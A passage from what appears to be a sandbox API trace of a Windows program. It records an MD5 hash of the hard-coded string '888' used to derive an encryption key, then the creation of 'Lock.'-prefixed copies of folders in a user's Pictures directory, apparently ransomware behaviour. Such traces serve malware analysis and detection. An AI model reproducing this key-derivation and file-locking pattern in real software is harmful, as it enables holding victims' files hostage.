wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.252] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.253] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.253] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.253] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0211.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.253] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0211.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.254] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.254] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.254] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.254] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.254] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.254] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.254] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.254] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.254] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.254] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.254] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.254] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.254] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.254] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.255] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.255] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.255] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.255] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab3f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0211.255] CryptCreateHash (in: hProv=0xa7c5d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0211.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71cd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.255] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0211.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.256] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.256] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0211.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab248, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0211.256] CryptHashData (hHash=0x9e1ab8, pbData=0x2a71cf8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0211.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.256] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.256] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.256] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.257] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.257] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.257] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab170, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0211.257] CryptDeriveKey (in: hProv=0xa7c5d8, Algid=0x6601, hBaseData=0x9e1ab8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1bf8) returned 1 [0211.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.258] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.258] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.258] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.258] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.258] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.258] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.258] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.258] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0211.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0211.259] CryptDestroyHash (hHash=0x9e1ab8) returned 1 [0211.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.259] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Saved Pictures" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0211.260] GetLastError () returned 0x5 [0211.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0211.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0211.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a746a0 [0211.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.261] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0211.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a746a0 | out: hHeap=0x2af0000) returned 1 [0211.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3854008 [0211.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0211.261] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.Saved Pictures" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.saved pictures"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0211.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0211.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0211.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 